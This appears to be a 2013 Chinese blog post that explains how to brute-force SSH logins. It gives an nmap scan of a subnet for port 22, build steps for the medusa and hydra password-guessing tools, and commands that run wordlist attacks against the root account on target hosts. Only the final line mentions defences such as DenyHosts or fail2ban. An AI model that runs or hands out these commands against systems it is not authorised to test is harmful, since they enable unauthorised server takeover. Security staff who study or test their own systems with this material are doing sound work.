ssh暴力破解工具
2013-08-02登陆ssh,就能操控这个服务器。所以ssh默认端口遭受暴力破解会很多,那么暴力破解ssh是如何实现的呢?
1、扫描端口
nmap -sV -p22 -oG ssh 192.168.1.0/24
2、medusa暴力破解工具
#安装medusa
wget http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz
tar -zxvf medusa-2.1.1.tar.gz
cd medusa-2.1.1
./configure
make
make install
#使用方法
medusa -H ssh1.txt -u root -P p.txt -M ssh
#查看帮助
medusa
#查看支持的模块
medusa -d
3、hydra 暴力破解工具
#安装libssh
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxvf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
#安装hydra
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install
#使用hydra
hydra 172.16.10.2 ssh -l root -P pass.txt
4、为了防止ssh暴力破解,需要安装DenyHosts或者fail2ban等软件。
分类:安全、操作系统 | 标签: ssh |